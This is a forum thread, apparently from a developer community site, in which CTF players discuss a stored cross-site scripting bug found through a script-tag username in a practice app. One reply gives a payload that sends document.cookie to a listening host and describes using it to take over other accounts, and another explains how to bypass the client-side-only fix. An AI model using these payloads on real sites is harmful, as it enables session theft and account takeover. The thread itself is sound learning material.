Hey! I found a XSS bug that didn't lead to a flag. I create a user with a username of <script>alert('xss!')</script> and then created a post by that user.
This meant when logging as that user - or indeed another user, the JS was executed in the context of the logged in user. But there was no flag associated with it!
Do you think that's a real bug or is there something I'm missing? I've completed all 7 flags now and none of them seem to relate to XSS :/
I write to better educate myself as I go through CTFs and Bug Bounties. If anything I have written is incorrect, please let me know and send me a link to an article to read to better educate myself.
Location
Seattle
Education
Information Technology BA and Software Engineering Bootcamp Grad
Well being that these ctfs are for learning and there are specific hints aimed towards the flags I'd say that it's just a happy easter egg that you found. Go you!👍
Your friendly developer and IT undergrad who loves exploring technologies and figuring out their underhood functioning. Exploring whatever comes on my way.
yeah even I found that and I used it to steal cookie using: <script>fetch('http://localhost:8080/?'+document.cookie)</script> it and easily logged into other accounts without username or password, however no flags found ;-;
Nice Finding Brother, however they have patched the same now, so username can only contain lowercase letters. but they still are using client side validation, so if you can capture the request, you can still peroform Stored XSS
For further actions, you may consider blocking this person and/or reporting abuse
We're a place where coders share, stay up-to-date and grow their careers.
Hey! I found a XSS bug that didn't lead to a flag. I create a user with a username of
<script>alert('xss!')</script>and then created a post by that user.This meant when logging as that user - or indeed another user, the JS was executed in the context of the logged in user. But there was no flag associated with it!
Do you think that's a real bug or is there something I'm missing? I've completed all 7 flags now and none of them seem to relate to XSS :/
Well being that these ctfs are for learning and there are specific hints aimed towards the flags I'd say that it's just a happy easter egg that you found. Go you!👍
yeah even I found that and I used it to steal cookie using:
<script>fetch('http://localhost:8080/?'+document.cookie)</script>it and easily logged into other accounts without username or password, however no flags found ;-;Nice Finding Brother, however they have patched the same now, so username can only contain lowercase letters. but they still are using client side validation, so if you can capture the request, you can still peroform Stored XSS